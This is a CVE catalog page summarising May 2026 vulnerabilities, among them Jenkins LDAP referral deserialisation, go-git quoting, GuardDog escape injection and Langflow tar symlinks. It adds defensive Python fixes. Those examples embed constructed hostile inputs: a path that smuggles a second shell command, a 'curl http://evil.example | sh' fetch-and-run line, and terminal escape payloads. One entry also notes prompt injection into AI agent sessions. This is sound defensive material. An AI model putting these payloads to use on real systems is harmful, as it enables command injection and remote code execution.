CVE Catalog

Browse the latest Common Vulnerabilities and Exposures (CVEs) with CVSS scores, affected products, and next-gen risk scores.

May 27, 2026

Jenkins Active Directory Plugin Unvalidated LDAP Referral Vulnerability Leading to Remote Code Execution

A vulnerability in the Jenkins Active Directory Plugin, versions 2.41 and earlier, allows remote code execution because LDAP referrals are followed without validation. By default the plugin follows referrals returned by the configured Active Directory server, and a referral can point at an RMI URL. Following such a referral causes Jenkins to deserialize attacker-controlled data, which leads to remote code execution on the Jenkins controller if suitable deserialization 'gadgets' are available. Exploitation requires control of the LDAP server or the ability to perform a man-in-the-middle attack on the connection to it.

2.8
May 27, 2026

Jenkins LDAP Plugin Unvalidated LDAP Referral Deserialization Vulnerability

A deserialization vulnerability has been identified in the Jenkins LDAP Plugin, versions 807.v7d7de30930cf and earlier. The plugin deserializes data obtained by following LDAP referrals without validating it, which can lead to remote code execution on the Jenkins controller when deserialization 'gadgets' are available on the classpath. Exploitation requires control of the configured LDAP server or the ability to perform a man-in-the-middle attack.

3.3
May 27, 2026

Jenkins LDAP Plugin Unvalidated LDAP Referral Vulnerability Leading to Remote Code Execution

A remote code execution vulnerability exists in the Jenkins LDAP Plugin, versions 807.v7d7de30930cf and earlier. The plugin follows LDAP referrals returned by the configured LDAP server, and a referral can point at an RMI URL; following it causes Jenkins to deserialize attacker-controlled data, leading to remote code execution on the Jenkins controller when suitable deserialization 'gadgets' are on the classpath. Exploitation requires control of the LDAP server or the ability to perform a man-in-the-middle attack.

2.9
May 27, 2026

Gradio Cookie Injection Vulnerability in Reverse Proxy Endpoint Allowing Cross-Space Session Fixation

A cookie injection vulnerability has been identified in Gradio versions prior to 6.15.0. The reverse proxy endpoint uses a single module-level HTTP client shared by all users, so a cookie set by one upstream is stored in that client and replayed on later requests. An attacker who controls any Hugging Face Space can set a parent-domain cookie that the shared client stores and then automatically sends with subsequent proxy requests to other, legitimate Spaces, fixing the session for every user of the same Gradio deployment (cross-space session fixation).

5.9
May 27, 2026

Taipy Path Traversal Vulnerability in ElementLibrary.get_resource() Method

A path traversal vulnerability has been identified in Taipy version 4.1.1, in the ElementLibrary.get_resource() method. An unauthenticated attacker can escape the designated module directory because the path containment check is inadequate: it compares paths with str.startswith() against a prefix that has no trailing path separator. Flask's path converter and Werkzeug's WSGI layer preserve traversal segments in the request path, so a crafted GET request containing such segments can resolve to a sibling directory on disk whose name begins with the same prefix (for example, a directory named like the library directory with extra characters appended); that path passes the check, giving access to files outside the intended library directory.

4.6
May 27, 2026

Agent Zero Stored Cross-Site Scripting Vulnerability in Image_Get API Endpoint

A stored cross-site scripting vulnerability has been identified in Agent Zero versions prior to 1.15. An attacker can upload a crafted SVG file and have it served through the image_get API endpoint, where it executes arbitrary JavaScript in the application's origin. The response lacks Content-Security-Policy, X-Content-Type-Options, and Content-Disposition headers, so the browser renders the SVG inline rather than treating it as a download. An attacker who lures an authenticated user to the image_get URL gets script execution as that user, which can steal the csrf_token cookie and then make API calls on the user's behalf.

4.2
May 27, 2026

Agent Zero Path Traversal Vulnerability Allowing Arbitrary File Reads

A path traversal vulnerability has been identified in Agent Zero versions prior to 1.15. This vulnerability allows unauthenticated attackers to read arbitrary files by sending crafted paths to the image file serving endpoint. The endpoint only checks file extensions against an allowlist, while the path containment verification is disabled. As a result, attackers can access any file with an image extension that the Agent Zero process can read, including files outside the application workspace, in user home directories, or on mounted volumes. The vulnerability also allows for symlink-based escapes due to inadequate path canonicalization in the path resolution process.

4.3
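The containment bug described in the Taipy entry above (str.startswith() against a prefix with no trailing separator) and the missing canonicalization in this Agent Zero entry are the same mistake seen from two sides. The following Python is an added example, not code from either project: it places the flawed prefix check beside a hardened check built on os.path.realpath() and os.path.commonpath(), and exercises both against a constructed directory layout (a sibling directory sharing the prefix, a ../ segment, and a symlink pointing outside the base). The directory names and sample files are constructed for the demonstration.

```python
import os
import tempfile


def naive_contains(base_dir: str, requested: str) -> bool:
    """The flawed check: join, normalise, then compare string prefixes.
    Without a trailing separator, '/srv/lib_evil' starts with '/srv/lib',
    and abspath() leaves symlinks unresolved, so both escapes pass."""
    candidate = os.path.abspath(os.path.join(base_dir, requested))
    return candidate.startswith(base_dir)


def hardened_contains(base_dir: str, requested: str) -> bool:
    """Resolve symlinks on both sides, then require that the resolved target
    is the base directory or one of its descendants.  commonpath() works on
    path components, so a sibling that merely shares a name prefix fails."""
    real_base = os.path.realpath(base_dir)
    real_target = os.path.realpath(os.path.join(real_base, requested))
    try:
        return os.path.commonpath([real_base, real_target]) == real_base
    except ValueError:  # raised on Windows when the paths are on different drives
        return False


def run_demo() -> dict:
    """Build a constructed layout under a temp dir and return, per request,
    (naive_result, hardened_result).  True means 'allowed'."""
    root = tempfile.mkdtemp()
    base = os.path.join(root, "lib")          # the directory files may be served from
    sibling = os.path.join(root, "lib_evil")  # shares the string prefix 'lib'
    outside = os.path.join(root, "outside")
    for d in (base, sibling, outside):
        os.makedirs(d)
    with open(os.path.join(base, "logo.svg"), "w") as fh:
        fh.write("<svg/>\n")
    for d in (sibling, outside):
        with open(os.path.join(d, "secret.txt"), "w") as fh:
            fh.write("constructed secret\n")
    # A symlink inside the served directory that points outside it (needs
    # symlink privileges on Windows; on POSIX it just works).
    os.symlink(os.path.join(outside, "secret.txt"), os.path.join(base, "escape.txt"))

    requests = {
        "normal": "logo.svg",
        "sibling_prefix": "../lib_evil/secret.txt",  # passes startswith(), escapes
        "parent": "../outside/secret.txt",           # startswith() does catch this one
        "symlink": "escape.txt",                     # inside by name, outside on disk
    }
    return {name: (naive_contains(base, p), hardened_contains(base, p))
            for name, p in requests.items()}


if __name__ == "__main__":
    for name, (naive_ok, hardened_ok) in run_demo().items():
        print(f"{name:15s} naive={'allow' if naive_ok else 'deny':5s} "
              f"hardened={'allow' if hardened_ok else 'deny'}")
```

The check must run on the resolved path of the file that will actually be opened; checking the request string and then opening something else (or opening through an existing symlink) is the same bug in a different place.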
May 27, 2026

go-git Path Validation Vulnerability Allowing Unintended .git Directory Modifications

A path validation vulnerability has been identified in go-git, a Git implementation written in Go, affecting versions prior to 5.19.1 and 6.0.0-alpha.4. Crafted repository data can cause writes to files outside the intended checkout area, including the repository's own .git directory, because go-git omits validation checks that upstream Git has enforced for years. Exploitation requires a maliciously crafted repository payload; some of the attack vectors are specific to Windows, some to macOS, and some apply on all supported platforms.

4.4
May 27, 2026

go-git Improper Single-Quote Escaping in SSH Transport Vulnerability

A vulnerability exists in go-git's SSH transport in versions prior to 5.19.1 and 6.0.0-alpha.4. The transport builds the remote exec command by wrapping the repository path in single quotes but does not escape single quotes that appear inside the path, so a path containing a single quote terminates the quoted region and the remainder of the path is appended as additional shell tokens. On SSH servers that run the exec command through a shell, those tokens are executed as further commands in the SSH user's environment. The issue is fixed in go-git 5.19.1 and 6.0.0-alpha.4.

4.7
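The quoting bug above is easy to reproduce outside Go. The following Python is an added example, not go-git's code: it builds the remote command the way the flawed transport did (wrapping the path in single quotes without escaping), applies the standard POSIX fix (close the quote, emit an escaped quote, reopen), and uses shlex.split() as a stand-in shell tokenizer to show how many words the remote shell would see. The repository path is constructed for the demonstration and the git-upload-pack command form is assumed for illustration.

```python
import shlex

# Constructed attacker-controlled repository path: the first quote closes the
# region the transport opened, the rest becomes extra shell tokens.
MALICIOUS_PATH = "repo.git'; touch /tmp/pwned; echo '"


def naive_ssh_command(repo_path: str) -> str:
    """Mirrors the flaw: wrap in single quotes, escape nothing."""
    return "git-upload-pack '%s'" % repo_path


def escape_single_quoted(value: str) -> str:
    """POSIX single-quote idiom: a quote inside the value is written as '\\''
    (close quote, escaped literal quote, reopen quote).  Inside single quotes
    every other byte, including $ and backticks, is literal."""
    return "'" + value.replace("'", "'\\''") + "'"


def hardened_ssh_command(repo_path: str) -> str:
    return "git-upload-pack " + escape_single_quoted(repo_path)


def stdlib_quoted_command(repo_path: str) -> str:
    """Same result using the standard library's quoting routine."""
    return "git-upload-pack " + shlex.quote(repo_path)


def shell_words(command: str) -> list:
    """Tokenise like a POSIX shell would (shlex follows sh quoting rules)."""
    return shlex.split(command)


if __name__ == "__main__":
    print("naive    :", shell_words(naive_ssh_command(MALICIOUS_PATH)))
    print("hardened :", shell_words(hardened_ssh_command(MALICIOUS_PATH)))
    print("stdlib   :", shell_words(stdlib_quoted_command(MALICIOUS_PATH)))
```

With the naive form the remote shell sees six words, among them a second command; with either quoted form it sees exactly two, the program and the unchanged path. Quoting only matters because the remote side runs the string through a shell; a transport that could pass an argument vector instead would not need it.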
May 27, 2026

go-git Improper Parsing Vulnerability Leading to Signature Verification Issues

A vulnerability exists in go-git, a Git implementation library in Go, prior to versions 5.19.0 and 6.0.0-alpha.3. The issue arises from go-git’s handling of malformed Git objects, particularly in commit or tag headers, which can lead to a decoded representation that differs from upstream Git's interpretation. This discrepancy can cause problems in commit signing and verification, as go-git may process a commit payload that is not an exact byte-for-byte match with the original object in the repository. Consequently, a signature might be incorrectly validated for a commit whose metadata does not accurately reflect the intended signed object.

4.5
May 27, 2026

LibVNCClient Tight Encoding Gradient Filter Vulnerability Leading to Out-of-Bounds Writes

A vulnerability in LibVNCClient versions 0.9.15 and earlier allows out-of-bounds writes when decoding Tight-encoded rectangles that use the Gradient filter. The Gradient filter decoder uses fixed-size buffers but does not reject rectangles wider than 2048 pixels, so a malicious VNC server can send a crafted FramebufferUpdate rectangle that overruns those buffers and corrupts memory in the client.

4.2
May 27, 2026

GuardDog CLI Tool Terminal Escape Injection Vulnerability

A vulnerability exists in GuardDog, a command-line interface tool for identifying malicious PyPI packages, versions 2.6.0 through 2.9.0. The tool's default human-readable output prints attacker-controlled filenames, file locations, messages, and code snippets without escaping terminal control characters, so a malicious package can inject ANSI or OSC escape sequences into an analyst's terminal or into continuous integration logs.

3.7
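Neutralising terminal control sequences before printing attacker-controlled strings is the fix for the class of issue above. The following Python is an added example, not GuardDog's code: it rewrites CSI, OSC and other ESC-introduced sequences (plus their 8-bit C1 forms and stray control bytes other than tab and newline) into their visible escaped spelling, so an analyst sees the text \x1b[2K in the output instead of having the line erased. The malicious finding it renders is constructed for the demonstration.

```python
import re

# 7-bit ESC-introduced sequences and their 8-bit C1 equivalents.  Order matters:
# CSI (ESC [) and OSC (ESC ]) must be tried before the generic two-byte ESC form,
# and the stray-control class must come last so it only catches what is left.
_CSI = r"\x1b\[[0-?]*[ -/]*[@-~]"                  # ESC [ params intermediates final
_OSC = r"\x1b\][^\x07\x1b]*(?:\x07|\x1b\\)"          # ESC ] ... BEL | ESC \
_C1_CSI = r"\x9b[0-?]*[ -/]*[@-~]"
_C1_OSC = r"\x9d[^\x07\x9c]*(?:\x07|\x9c)"
_OTHER_ESC = r"\x1b[@-Z\\-_]"                       # any other Fe sequence (ESC + one byte)
_STRAY_CONTROL = r"[\x00-\x08\x0b-\x1f\x7f\x80-\x9f]"  # C0 (except \t, \n) and C1 bytes
_CONTROL_RE = re.compile("|".join([_CSI, _OSC, _C1_CSI, _C1_OSC, _OTHER_ESC, _STRAY_CONTROL]))


def neutralize_terminal_controls(text: str) -> str:
    """Replace every control sequence with its visible escaped spelling
    (unicode_escape turns ESC into the four characters \\x1b, CR into \\r, ...)."""
    return _CONTROL_RE.sub(
        lambda m: m.group(0).encode("unicode_escape").decode("ascii"), text)


def is_terminal_safe(text: str) -> bool:
    """True when nothing remains that a terminal could interpret."""
    return _CONTROL_RE.search(text) is None


# Constructed: what a hostile package could put into scanner output.  The
# 'location' erases the line and paints a fake green verdict, the 'message'
# carries an OSC 8 hyperlink, the 'code' uses CR plus an OSC 0 title change.
MALICIOUS_FINDING = {
    "location": "setup.py\x1b[2K\x1b[1G\x1b[32m[OK] no issues found\x1b[0m",
    "message": "details: \x1b]8;;https://evil.example/\x07release notes\x1b]8;;\x07",
    "code": "os.system('curl http://evil.example | sh')\r\x1b]0;pwned\x07",
}


def render_finding(finding: dict) -> str:
    """Render a finding for a terminal or CI log.  Keys are the scanner's own
    and trusted; every value came from the package and is neutralised."""
    return "\n".join(f"{key}: {neutralize_terminal_controls(value)}"
                     for key, value in finding.items())


if __name__ == "__main__":
    print(render_finding(MALICIOUS_FINDING))
```

Escaping rather than stripping is deliberate: a stripped sequence hides the fact that the package tried to manipulate the terminal, which is itself a finding worth seeing. Tab and newline are kept because the output is line-oriented; carriage return is not, since it is the classic way to overwrite a line.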
May 27, 2026

GuardDog SSRF Vulnerability Leading to GitHub Token Exfiltration

A server-side request forgery (SSRF) vulnerability has been identified in GuardDog, a command-line tool for detecting malicious PyPI packages, affecting versions 1.0.0 through 2.9.0. The remote project scanning feature rewrites an attacker-controlled repository URL without validating its host and then sends the request, carrying the user's GitHub token (GH_TOKEN) as HTTP Basic Authentication credentials, to whatever host the rewritten URL points at. An attacker who can influence the scanned URL can therefore capture the GitHub token and use it to read private data or act on the user's behalf.

3.3
May 27, 2026

OpenTelemetry JS Prometheus Exporter Denial-of-Service Vulnerability

A denial-of-service vulnerability has been identified in the OpenTelemetry JavaScript Client, specifically in versions prior to 0.217.0 of the Prometheus exporter. The issue arises because the metrics endpoint, which listens on 0.0.0.0:9464 by default, lacks proper error handling for URL parsing. As a result, a single malformed HTTP request can cause an uncaught TypeError that crashes any Node.js process using this exporter. This vulnerability is particularly concerning because the metrics endpoint is unauthenticated and accessible by any network client that can reach the metrics port.

4.7
May 27, 2026

RabbitMQ Unsanitized Vhost Names Allow Cross-Site Scripting in Management UI

A cross-site scripting (XSS) vulnerability has been identified in RabbitMQ's management UI, affecting versions from 3.7.0 up to but not including the fixed releases 4.1.2 and 4.0.13. Virtual host names are rendered without sanitization in the management UI pages that list virtual hosts; the issue is exploitable when an attacker can force a virtual host with a crafted name to restart, which injects script into those pages.

5.9
May 27, 2026

Nocturne Memory Authentication Bypass Vulnerability Allowing Unauthorized API Access

An authentication bypass vulnerability has been identified in Nocturne Memory versions prior to 2.4.1. When the API_TOKEN is unset or empty, the BearerTokenAuthMiddleware allows unauthorized access to all HTTP requests. This issue is compounded by the default host binding of 0.0.0.0 and permissive CORS settings, which together expose the full Knowledge-Graph read/write API to any client on the same local network. As a result, an attacker can read, write, or delete all memory entries, including critical system URIs that could enable persistent prompt-injection in downstream agent sessions.

2.5
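The pattern behind this Nocturne Memory entry (an empty secret silently turning authentication off, compounded by binding all interfaces and permissive CORS) is worth seeing as code. The following Python is an added example, not the project's middleware: it shows the fail-open check beside a fail-closed one that refuses to serve at all when API_TOKEN is unset, compares tokens in constant time, and adds a start-up validation that reports the dangerous combination of settings. The HOST and CORS_ORIGINS variable names, the 0.0.0.0 and '*' defaults, the sample token and the 32-character minimum length are assumptions made for the demonstration.

```python
import hmac
from typing import Optional

MIN_TOKEN_LENGTH = 32  # assumed policy for the example, not the project's
TOKEN = "constructed-example-token-0123456789abcdef"  # constructed sample secret


class MisconfiguredAuth(RuntimeError):
    """Raised instead of serving when the deployment has no usable secret."""


def vulnerable_is_authorized(configured_token: Optional[str],
                             authorization_header: Optional[str]) -> bool:
    """Mirrors the flaw: an unset or empty token disables the check for every request."""
    if not configured_token:
        return True
    return authorization_header == f"Bearer {configured_token}"


def hardened_is_authorized(configured_token: Optional[str],
                           authorization_header: Optional[str]) -> bool:
    """Fail closed: no token means no service, and a presented token is compared
    in constant time after the scheme has been checked."""
    if not configured_token or len(configured_token) < MIN_TOKEN_LENGTH:
        raise MisconfiguredAuth("API_TOKEN is unset or too short; refusing to serve")
    if not authorization_header:
        return False
    scheme, _, presented = authorization_header.partition(" ")
    if scheme.lower() != "bearer" or not presented:
        return False
    return hmac.compare_digest(presented.encode("utf-8"),
                               configured_token.encode("utf-8"))


def fails_closed_when_unset() -> bool:
    """True if the hardened check refuses to run without a configured token."""
    try:
        hardened_is_authorized("", None)
    except MisconfiguredAuth:
        return True
    return False


def startup_problems(env: dict) -> list:
    """Report the settings that, in combination, expose the API to the whole
    network.  Variable names and defaults are assumed for the example."""
    problems = []
    token = env.get("API_TOKEN", "")
    host = env.get("HOST", "0.0.0.0")
    origins = env.get("CORS_ORIGINS", "*")
    if len(token) < MIN_TOKEN_LENGTH:
        problems.append("API_TOKEN unset or too short: every request would be accepted")
    if host in ("0.0.0.0", "::") and not token:
        problems.append("binding all interfaces without a token exposes the API to the whole network")
    if origins.strip() == "*":
        problems.append("CORS allows any origin: a browser on the same network can drive the API")
    return problems


if __name__ == "__main__":
    print("vulnerable, empty token, no header :", vulnerable_is_authorized("", None))
    print("hardened fails closed              :", fails_closed_when_unset())
    for problem in startup_problems({}):
        print("startup problem:", problem)
```

The start-up check is the part most deployments lack: a missing secret should stop the process from listening, not degrade into an open server that only a log line, if that, mentions.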
May 27, 2026

Auth0.js Improper Permission Checking Vulnerability Allowing Unauthorized User Profile Access

A vulnerability exists in the Auth0.js SDK in versions from 8.11.0 up to but not including 9.32.0. Under certain conditions the SDK discloses user profile information when presented with a valid access token together with a specially crafted, invalid ID token. Applications that rely on access control rules defined in Auth0 Actions are affected.

3.6
May 27, 2026

Tauri Origin Confusion Vulnerability in Custom URI Scheme Handling on Windows and Android

A vulnerability exists in Tauri versions 2.0 through 2.11.0, where the 'is_local_url()' function incorrectly identifies remote URLs as trusted local origins on Windows and Android. This misclassification allows remote pages to invoke local-only inter-process communication (IPC) commands. The issue arises because Tauri's origin check only evaluates the first subdomain, enabling attackers to exploit custom URI schemes by hosting pages on matching subdomains. The vulnerability is patched in Tauri version 2.11.1.

5.7
May 27, 2026

Dolibarr ERP/CRM Arbitrary Code Execution Vulnerability

A vulnerability allowing remote code execution has been identified in Dolibarr ERP/CRM versions 22.0.0 through 22.0.4, as well as in version 24.0.0-alpha under certain conditions. The issue arises from the 'dol_eval()' function, which is a wrapper around PHP's 'eval()' and is used to evaluate dynamic expressions throughout the application. In the affected versions, an administrator can inject PHP code into specific database fields, which is then executed when the application processes those fields. This vulnerability can be exploited by chaining it with another vulnerability in the same application that allows execution of operating system commands.

5.4
May 27, 2026

Dolibarr ERP/CRM Arbitrary Code Execution Vulnerability in Cron Job Scheduler

A remote code execution vulnerability has been identified in Dolibarr ERP/CRM versions 22.0.0 through 22.0.4, as well as in version 24.0.0-alpha. The issue arises from the cron job scheduler, where user-controlled input is passed directly to PHP's call_user_func_array() function without proper validation. This vulnerability allows an authenticated attacker to execute arbitrary code on the server.

5.8
May 27, 2026

Dolibarr ERP/CRM Arbitrary Code Execution Vulnerability via Extrafields

A vulnerability allowing remote code execution has been identified in Dolibarr ERP/CRM versions 22.0.0 through 22.0.4, as well as in version 24.0.0-alpha under certain conditions. The issue arises from the use of the 'dol_eval()' function, which is a wrapper around PHP's 'eval()' that evaluates dynamic expressions. This vulnerability is present in the 'htdocs/core/actions_addupdatedelete.inc.php' file, where user-controlled input can be injected into the 'perms' attribute of extrafields. An administrator can exploit this by storing a PHP expression in the database, which is then executed when the corresponding business object is updated or fetched.

5.8
May 27, 2026

Craft CMS Missing Authorization Vulnerability in Migrate Endpoint

A missing authorization vulnerability has been identified in Craft CMS versions through 5.9.5. This vulnerability exists in the migrate endpoint of the application.

7.2
May 27, 2026

Jason2605 AdminPanel Cross-Site Request Forgery Vulnerability

A Cross-Site Request Forgery (CSRF) vulnerability exists in the delete.php endpoint of Jason2605 AdminPanel version 4.0 and prior. This vulnerability allows an attacker to perform file deletion actions on behalf of an authenticated user without their consent. The issue arises from a lack of CSRF protections, as the endpoint does not validate the origin of requests or require a CSRF token, and it exposes sensitive actions through GET requests.

3.6
May 27, 2026

IBM Business Automation Workflow Database Structure Information Disclosure Vulnerability

An information disclosure vulnerability has been identified in IBM Business Automation Workflow, both in containerized and traditional deployments. This vulnerability may leak details about the application's database structure through error messages. It affects versions 24.0.0, 24.0.1, 25.0.0, and 25.0.1.

2.8
May 27, 2026

libjxl Heap Buffer Overflow Vulnerability in PBM Image Decoding

A heap buffer overflow vulnerability has been identified in libjxl version 0.12.0. The issue arises in the jxl::extras::DecodeImagePNM function within the PNM decoding component. When the library processes specially crafted PBM images, it fails to properly validate buffer sizes before executing memory copy operations. This oversight allows the memcpy function to write 24 bytes into a buffer that can only accommodate 16 bytes, leading to memory corruption.

4.2
May 27, 2026

Keycloak Privilege Escalation Vulnerability via Oversized JWT in TokenEndpoint

A vulnerability in Keycloak allows an authenticated user with low privileges to escalate rights by sending an oversized subject_token JSON Web Token (JWT) to the TokenEndpoint. Tokens exceeding 4000 characters are silently discarded, causing the system to revert to client credentials. This switch grants the user access to the permissions of the client's service account, facilitating unauthorized privilege escalation.

4.7
May 27, 2026

PostgreSQL Anonymizer Superuser Privilege Escalation Vulnerability

A vulnerability in PostgreSQL Anonymizer allows users to gain superuser privileges by creating a table and inserting malicious code into a column identifier. When a superuser invokes the k-anonymity function, the embedded code is executed with elevated privileges. This issue is more pronounced in PostgreSQL 14 or in instances upgraded from PostgreSQL 14 or earlier. In PostgreSQL 15 and later, the default revocation of creation permissions in the public schema limits this exploit to users explicitly granted the CREATE TABLE privilege.

5.6
May 27, 2026

IBM Aspera High-Speed Transfer Products Arbitrary File Read Vulnerability

A potential arbitrary file read vulnerability has been identified in the asperahttpd component of IBM Aspera High-Speed Transfer Endpoint and IBM Aspera High-Speed Transfer Server, in versions from 3.7.4 up to but not including 4.4.7 Fix Pack 1. An authenticated user can read files in the server's local storage to which they should not have access.

3.9
May 27, 2026

IBM Guardium Data Protection Long Term Retention Feature Sensitive Information Exposure Vulnerability

A vulnerability exists in the 'Long Term Retention' (LTR) add-on feature of IBM Guardium Data Protection versions 12.2.1 and 12.2.2. When debug mode is enabled, this feature can inadvertently expose sensitive credentials.

2.5
May 27, 2026

IBM Aspera High-Speed Transfer Products asperahttpd Denial-of-Service Vulnerability

A denial-of-service vulnerability has been identified in the asperahttpd component of IBM Aspera High-Speed Transfer Endpoint and IBM Aspera High-Speed Transfer Server, in versions from 3.7.4 up to but not including 4.4.7 Fix Pack 1. An unauthenticated user can crash the asperahttpd service, causing a service disruption.

4.8
May 27, 2026

IBM Aspera High-Speed Transfer Products Buffer Overflow Vulnerability in asperahttpd Component Allowing Arbitrary Code Execution

A buffer overflow vulnerability has been identified in the asperahttpd component of IBM Aspera High-Speed Transfer Endpoint and IBM Aspera High-Speed Transfer Server, in versions from 3.7.4 up to but not including 4.4.7 Fix Pack 1. An authenticated user could exploit it to execute arbitrary code on the system.

3.9
May 27, 2026

IBM Aspera High-Speed Transfer Products Buffer Overflow Vulnerability in asperahttpd Component

A buffer overflow vulnerability has been identified in the asperahttpd component of IBM Aspera High-Speed Transfer Endpoint and IBM Aspera High-Speed Transfer Server, in versions from 3.7.4 up to but not including 4.4.7 Fix Pack 1. It could be exploited to cause a denial of service and potentially lead to authentication bypass or remote code execution.

4.7
May 27, 2026

IBM Aspera HSTS for CP4I Authentication Bypass Vulnerability Allowing Unauthorized File Access

An authentication bypass vulnerability has been identified in IBM Aspera High-Speed Transfer Server for Cloud Pak for Integration (CP4I) versions 1.5.1 through 1.5.19. This vulnerability allows a transfer client to access files in the server's local storage that should be restricted, potentially leading to unauthorized file access.

3.9
May 27, 2026

IBM Langflow OSS Uncontrolled Resource Consumption Leading to Denial-of-Service Vulnerability

A denial-of-service vulnerability has been identified in IBM Langflow OSS versions 1.0.0 through 1.9.0. This issue arises from uncontrolled resource consumption, allowing unauthenticated users to upload an unlimited number of files via the deprecated /api/v1/upload/{flow_id} endpoint. The lack of authentication and validation enables potential disk space exhaustion and information disclosure through absolute file path leakage in API responses.

3.4
May 27, 2026

IBM Langflow OSS Remote Code Execution Vulnerability via Symbolic Link Misvalidation

A remote code execution vulnerability exists in IBM Langflow OSS versions 1.0.0 through 1.9.1. The issue arises from improper validation of symbolic links during the extraction of tar archives, allowing attackers to exploit symlinks to access arbitrary files on the file system. In scenarios where users can upload documents, a crafted tar file could be used to link to sensitive files, such as Langflow OSS' JWT secret key. Once these files are processed and stored in the vector database, the attacker could retrieve sensitive information through chatbot queries, potentially leading to authentication bypass and remote code execution via the Python Interpreter node.

2.6
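Refusing link members before extraction is the defence against the tar vector described above. The following Python is an added example, not Langflow's code: it validates every member of an archive before anything is written, rejects symlinks and hardlinks outright (a link whose target is inside the destination can still be followed by whatever indexes the files later), rejects device and FIFO members, and confirms with realpath() that each member lands inside the destination. The three archives it builds in memory (a benign one, one with a symlink standing in for the link to the JWT secret, and one with a ../ name) are constructed for the demonstration; the /etc/hostname link target is only a placeholder.

```python
import io
import os
import tarfile
import tempfile


class UnsafeArchiveMember(ValueError):
    """Raised for any member that must not be extracted."""


def validate_member(member: tarfile.TarInfo, dest: str) -> None:
    """Allow plain files and directories that resolve inside dest; nothing else."""
    if member.issym() or member.islnk():
        raise UnsafeArchiveMember(f"{member.name!r}: links are not allowed")
    if not (member.isfile() or member.isdir()):
        raise UnsafeArchiveMember(f"{member.name!r}: unsupported member type {member.type!r}")
    real_dest = os.path.realpath(dest)
    # join() discards real_dest for absolute names, and realpath() collapses
    # '..' and follows any symlink already present under dest, so absolute
    # names and traversal segments both end up outside real_dest and are rejected.
    target = os.path.realpath(os.path.join(real_dest, member.name))
    if os.path.commonpath([real_dest, target]) != real_dest:
        raise UnsafeArchiveMember(f"{member.name!r}: resolves outside the destination")


def safe_extract(archive: bytes, dest: str) -> list:
    """Validate every member first, then extract; returns the member names written."""
    # On Python 3.12+ also apply the stdlib 'data' filter as a second layer.
    extract_kwargs = {"filter": "data"} if hasattr(tarfile, "data_filter") else {}
    with tarfile.open(fileobj=io.BytesIO(archive), mode="r:") as tar:
        members = tar.getmembers()
        for member in members:          # all-or-nothing: no partial extraction
            validate_member(member, dest)
        for member in members:
            tar.extract(member, path=dest, set_attrs=False, **extract_kwargs)
    return [m.name for m in members]


def build_archive(entries) -> bytes:
    """Build a tar in memory from (name, kind, payload) tuples; kind is
    'file' (payload: bytes), 'dir' (payload ignored) or 'symlink' (payload: target)."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:") as tar:
        for name, kind, payload in entries:
            info = tarfile.TarInfo(name)
            if kind == "file":
                info.size = len(payload)
                tar.addfile(info, io.BytesIO(payload))
            elif kind == "dir":
                info.type = tarfile.DIRTYPE
                tar.addfile(info)
            elif kind == "symlink":
                info.type = tarfile.SYMTYPE
                info.linkname = payload
                tar.addfile(info)
    return buf.getvalue()


# Constructed archives for the demonstration.
BENIGN = build_archive([("docs", "dir", None),
                        ("docs/readme.txt", "file", b"hello\n")])
SYMLINK_TO_SECRET = build_archive([("docs/secret.key", "symlink", "/etc/hostname")])
TRAVERSAL = build_archive([("../escaped.txt", "file", b"x\n")])


def try_extract(archive: bytes):
    """Return (accepted, names) for an archive extracted into a fresh temp dir."""
    dest = tempfile.mkdtemp()
    try:
        return True, safe_extract(archive, dest)
    except UnsafeArchiveMember:
        return False, []


if __name__ == "__main__":
    for label, archive in (("benign", BENIGN), ("symlink", SYMLINK_TO_SECRET), ("traversal", TRAVERSAL)):
        print(f"{label:10s} -> {try_extract(archive)}")
```

The stdlib 'data' filter (Python 3.12, backported to the security releases of older branches) rejects absolute paths, traversal and links pointing outside the destination, but still permits in-tree symlinks; for a pipeline that later reads and indexes whatever was extracted, rejecting links altogether is the safer policy, which is why the example does its own validation first.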
May 27, 2026

IBM Operations Analytics and SmartCloud Analytics Log Analysis Default Password Authentication Bypass Vulnerability

A vulnerability exists in IBM Operations Analytics - Log Analysis and IBM SmartCloud Analytics - Log Analysis due to the use of default passwords from the manufacturing process, which are not required to be changed after installation. This flaw could enable an attacker to bypass authentication. The vulnerability affects versions 1.3.2.0, 1.3.3.0, 1.3.5.0, 1.3.5.1, 1.3.5.2, 1.3.5.3, 1.3.6.0, 1.3.6.1, 1.3.6.2, 1.3.7.0, 1.3.7.1, 1.3.7.2, 1.3.8.0, 1.3.8.1, 1.3.8.2, 1.3.8.3, and 1.3.8.4 on Linux.

3.1
May 27, 2026

IBM OpenBMC Denial-of-Service Vulnerability

A denial-of-service vulnerability has been identified in IBM OpenBMC versions FW1110.00 through FW1110.11. This vulnerability allows unauthenticated network users to disrupt the BMC's HTTPS service, leading to a denial-of-service condition.

5.0
May 27, 2026

IBM Db2 Authorization Bypass Vulnerability in Remote Object Storage Uploads

An authorization bypass vulnerability has been identified in IBM Db2 versions 12.1.0 through 12.1.4. This vulnerability occurs when uploading to a remote object storage path using a specific query, allowing unauthorized actions to be performed.

4.6
May 27, 2026

IBM i Denial-of-Service Vulnerability in Integrated Language Environment Compiler

A denial-of-service vulnerability has been identified in IBM i versions 7.6, 7.5, 7.4, and 7.3. This issue arises from uncontrolled recursion in the Integrated Language Environment (ILE) compiler. An authenticated attacker could exploit this vulnerability by compiling specially crafted source code that includes a specific combination of statements.

4.2
May 27, 2026

IBM Db2 Denial-of-Service Vulnerability in Range Partitioned Tables

A denial-of-service vulnerability has been identified in IBM Db2 versions 11.5.0 through 11.5.9 and 12.1.0 through 12.1.4. The issue arises when a specially crafted query is executed on range partitioned tables, leading to a service disruption.

4.1
May 27, 2026

IBM Db2 Out-of-Memory Vulnerability When Executing Queries with MDC Tables

A denial-of-service vulnerability has been identified in IBM Db2 versions 11.5.0 prior to 11.5.9 and 12.1.0 prior to 12.1.4. The issue arises when certain queries involving Multi-Dimensional Clustering (MDC) tables are executed, leading to excessive memory consumption and potential application crashes.

4.6
May 27, 2026

IBM Db2 Denial-of-Service Vulnerability

A denial-of-service vulnerability has been identified in IBM Db2 versions 11.5.0 through 11.5.9 and 12.1.0 through 12.1.4. The issue arises when a specially crafted query is executed using a small statement heap, leading to uncontrolled resource consumption.

4.3
May 27, 2026

IBM WebSphere Application Server Liberty Security Bypass Vulnerability

